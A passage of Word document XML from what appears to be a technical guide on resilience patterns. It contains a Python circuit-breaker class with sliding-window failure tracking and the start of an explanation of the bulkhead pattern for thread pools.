    <w:p w14:paraId="61AFD6CF" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    CLOSED = "closed"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D0AB0D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    OPEN = "open"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3EE21F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    HALF_OPEN = "half_open"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60759547" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="19ECB2B7" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>class CircuitBreaker:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2890DBDE" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    def __init__(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584F8EC4" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        self,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F24DB1A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        failure_threshold: int = 5,      # failures before opening</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F675D9" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        success_threshold: int = 2,       # successes to close from half-open</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6113D3FB" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        timeout: float = 60.0,            # seconds to wait in OPEN before trying</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B82F55" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        window_size: int = 10,            # requests in sliding window</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44FC9FFA" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        failure_rate_threshold: float = 0.5  # fraction of failures to open</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A921A54" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    ):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4208E08E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        self.failure_threshold = failure_threshold</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699B91D5" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        self.success_threshold = success_threshold</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103687F3" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        self.timeout = timeout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170A3A84" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        self.window_size = window_size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E738722" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        self.failure_rate_threshold = failure_rate_threshold</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3114117F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F00F93" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        self.state = State.CLOSED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39925D75" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        self.failures = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F18304A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        self.successes = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E01581C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        self.last_failure_time = None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349DD9C1" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        self.results = deque(maxlen=window_size)  # True=success, False=failure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B781B4" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        self.lock = threading.Lock()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F79FE5" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBDF54C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    def call(self, func, *args, **kwargs):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58784E08" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        with self.lock:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5678A1" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">            if self.state == State.OPEN:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025E654D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">                # Check if timeout has elapsed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A60DFE9" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">                if time.time() - self.last_failure_time &gt; self.timeout:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717ADC8A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">                    self.state = State.HALF_OPEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116B8476" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">                    self.successes = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C54CC0" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">                else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001E5033" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">                    raise CircuitOpenError(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F75DF7" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">                        f"Circuit is OPEN, failing fast. "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDC915E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">                        f"Retry after {self.timeout - (time.time() - self.last_failure_time):.1f}s"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C193B3" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">                    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4BF79E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F674E13" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392B1B66" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">            result = func(*args, **kwargs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C6F27E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">            self._on_success()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C51AED3" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">            return result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64ACD9CC" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        except Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562C5EC5" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">            self._on_failure()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3C8879" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">            raise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504C9326" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B60920" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    def _on_success(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7688CED0" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        with self.lock:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7972F89F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">            self.results.append(True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB8DDBA" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311F0D0D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">            if self.state == State.HALF_OPEN:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F447575" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">                self.successes += 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505AB2CA" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">                if self.successes &gt;= self.success_threshold:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4289CC72" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">                    self._close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B74FBD2" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11ED68EE" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    def _on_failure(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BDF2A6E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        with self.lock:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6BB21A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">            self.results.append(False)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9C57C1" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">            self.last_failure_time = time.time()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DF4574" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7851C7" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">            if self.state == State.HALF_OPEN:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE60293" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">                self._open()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FDC5F3" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">                return</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9FE18E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739CDC19" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">            # Check failure rate over window</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B4B147" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">            if len(self.results) == self.window_size:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2601D6EC" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">                failure_rate = self.results.count(False) / len(self.results)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9EE551" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">                if failure_rate &gt;= self.failure_rate_threshold:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD01622" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">                    self._open()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32EE2205" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">                    return</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749BE378" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7261A4" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">            # Also check absolute failure count</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E188B8D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">            recent_failures = sum(1 for r in self.results if not r)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EAE51D3" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            if recent_failures &gt;= self.failure_threshold:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6085EEEE" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">                self._open()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2C1427" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0DE106" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    def _open(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027EA09D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        self.state = State.OPEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE45D35" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        self.failures = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D8A09C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        # Emit metric: circuit_breaker_state_change{state="open"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76964FCB" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8017C0" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    def _close(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701C2E70" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        self.state = State.CLOSED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042E6B1D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        self.results.clear()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CFE4B9" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        self.failures = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59862EA0" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        self.successes = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB78A6B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        # Emit metric: circuit_breaker_state_change{state="closed"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B45D9A1" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BAB626" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    @property</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EAC6A4" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    def is_closed(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D35E91" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        return self.state == State.CLOSED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDFA41D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bulkhead pattern — resource isolation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A7B24B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406FC535" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Bulkhead analogy: ship compartments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AED538E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Without bulkhead: one hull breach → entire ship floods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DAB2523" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  With bulkhead: one compartment floods → others isolated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BC6C2F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8F10F4" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Applied to thread pools:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778A3E39" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Without bulkhead:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D820BE4" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    Single thread pool (100 threads) shared by:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510EF4FB" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      Payment service calls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D92224" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      Inventory service calls  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35FF9A91" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      User service calls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D97E33" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
